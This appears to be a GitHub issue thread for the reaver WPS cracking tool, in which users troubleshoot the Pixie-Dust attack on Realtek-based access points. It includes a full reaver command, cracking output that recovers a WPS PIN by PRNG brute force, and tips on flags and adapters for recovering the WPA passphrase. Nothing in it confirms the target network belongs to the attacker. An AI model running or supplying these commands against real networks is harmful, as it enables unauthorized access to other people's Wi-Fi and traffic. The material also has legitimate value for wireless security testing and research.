Brute Force never increments PIN and with K 1 if a pin is found it just hangs about reaver-wps-fork-t6x HOT 4 CLOSED

Regards to both problems: does the same thing happen for ALL access points? Different models? Etc?

There is no such thing as -K 4, the option that came up was probably -f. -f is a pixiewps command used against Realtek based APs when the nonce is not generated within the same second as E-S1 and E-S2. I'm actually not sure if you can use -f in Reaver or if you have to manually use -f in pixiewps, I've always had success without the full brute force.

from reaver-wps-fork-t6x.

My realteck acess point requires -f option
i'll be home in a cople of days and will be able to tell you if the option can be run straightforward in reaver or if you have to do it with pixiewps.

Than, remember that rt3070 devices work very bad with reaver.
Since the first version.
Try with bully, it works fine with rt3070 and the mod is very easy to do to get the element for pixiedust.

from reaver-wps-fork-t6x.

sorry for the delay....
I tried at home with reaver + pixiewps 1.2 against a supported realtek that requires the full brute force option.
i launched reaver with argument -k 1

sudo reaver -i wlan0mon -b B8:55:10:020:A1 -vv -K 1

I got to m3 mensage and pixiedust is automatically launched
It doesn't find the PIN at first

[+] Waiting for beacon from B8:55:10:02:F0:A1
[+] Switching wlan0mon to channel 11
[+] Associated with B8:55:10:02:F0:A1 (ESSID: TOTOLINK N301RT)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 690 ms
[Pixie-Dust]  

But is is launched automatically a second time with the -f option

[Pixie-Dust]   [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]  
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [*] PRNG Seed:  1344583431 (Fri Aug 10 07:23:51 2012 UTC)
[Pixie-Dust]   [*] Mode:       3 (RTL819x)
[Pixie-Dust]   [*] PSK1:       13:a8:23:9f:87:2e:f0:8b:35:52:98:dd:7e:00:fc:33
[Pixie-Dust]   [*] PSK2:       bd:38:5e:36:73:1b:c8:47:34:eb:3a:00:b2:e8:eb:60
[Pixie-Dust]   [*] E-S1:       2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust]   [*] E-S2:       2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust]   [+] WPS pin:    03004203
[Pixie-Dust]

You see that ES-1 = ES2 and pixiewps see it too, that why it knows that the device can be brute forced with the --force option

and than i can recover the wpa passphrase with the PIN - automatically

So there is no doubt about it :
If you use -K 1 in your reaver line you will execute automatically pixewps a second time with the "--force" option if the device is vulnerable and requires it.
Because that what pixewps does.

from reaver-wps-fork-t6x.

About your second issue :

Also i have noticed that often when using the -N -K 1 option i can successfully get the pin but it never gives me the psk..

That's maybe why the option -N is not enabled by default... 😉 : you should try with a basic syntax first (adding -n is a good trick, in lower case, not upper case)

from reaver-wps-fork-t6x.